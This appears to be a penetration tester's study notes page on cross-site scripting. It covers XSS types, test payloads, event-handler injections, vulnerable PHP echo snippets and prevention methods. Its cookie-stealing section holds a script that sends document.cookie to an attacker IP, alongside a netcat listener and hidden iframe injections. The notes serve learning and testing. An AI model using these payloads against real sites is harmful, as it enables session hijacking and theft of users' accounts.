[XSS] Cross Site Scripting

Links https://portswigger.net/web-security/cross-site-scripting https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)

YouTube

https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3

https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60

https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63

XSS vulnerabilities are caused due to unsanitized user input that is then displayed on a web page in HTML format. These vulnerabilities allow malicious attackers to inject client side scripts, such as JavaScript, into web pages viewed by other users.

Although XSS attacks don't directly compromise a machine, these attacks can still have significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more."

**Only JavaScript or VbScript embedded in auth.y.com can read cookies belonging to auth.y.com**

reflected = non persistence, echoed back immediately. In the HTTP request!
stored = persistence, stored in web application
DOM XSS = lives within the DOM environment, a page's client-side script itself and soes not reach server-side code

Camouflage URL

  • tinyurl

  • iframes

  • link in a targeted email

<plaintext> tag/payload for testing

alert('abc');alert(document.cookie)

string.fromCharCode(xxx, xxx, xxx)

Payload example

<script>
x = '<!--<script>' < /script>/ - alert(1)
</script>

PHP code injection

<?
echo '<h4>Hello ' . $_GET['name'] . '</h4>';
?>

Browser Redirection and IFRAME Injection

.<iframe SRC="http://$ip/report" height = "0" width ="0"></iframe>
invisible iframe
.<iframe src="http://<me>:<myport>/something" height="0" width="0"></iframe>

Stealing Cookies and Session Information

.<iframe src="http://10.11.0.5/report" height = "0" width = "0"></iframe>
.<script> new Image().src="http:10.11.0.126/bogus.php?output="+document.cookie; </script>

nc -nlvp 80

<img src="logo.png" alt="<?= $_GET['name'] ?>">

Exploitation with Beef

https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177

https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199

Put the hook link in the web page by XSS

With event handlers

abc" onmouseover=alert("XSS") "
onclick, onload, onerror etc

<a onmouseover="alert('xss')">xss link</a>
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=/ onerror="alert('xss')"></img>

How to prevent XSS

  • Encoding: < becomes &lt;

  • Filtering: becomes script

  • Validating: compare input against white list

  • Sanitization: combination of escaping, filtering and validation

PreviousWebNextDatabases

Last updated

Was this helpful?